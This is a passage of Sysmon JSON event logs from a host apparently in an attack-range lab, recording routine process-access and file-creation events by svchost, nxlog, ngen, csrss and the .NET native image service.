C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:24.325","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1344-5F25-0000-00102AC50D00}","TargetProcessId":"4864","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8066,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:24.638\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:24.638","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8067,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:25.638\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:25.638","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8068,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:26.638\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:26.638","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8069,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:27.357\r\nProcessGuid: {E2A3D6B1-1344-5F25-0000-00102AC50D00}\r\nProcessId: 4864\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1300-0\\ReachFramework.dll\r\nCreationUtcTime: 2020-08-01 07:01:27.357","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:27.357","ProcessGuid":"{E2A3D6B1-1344-5F25-0000-00102AC50D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1300-0\\ReachFramework.dll","CreationUtcTime":"2020-08-01 07:01:27.357","EventReceivedTime":"2020-08-01 07:01:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8070,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:27.435\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-00102E470C00}\r\nTargetProcessId: 2380\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:27.435","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-00102E470C00}","TargetProcessId":"2380","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8071,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:27.435\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-00102E470C00}\r\nTargetProcessId: 2380\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:27.435","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-00102E470C00}","TargetProcessId":"2380","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8072,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:27.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-00102E470C00}\r\nTargetProcessId: 2380\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:27.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-00102E470C00}","TargetProcessId":"2380","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
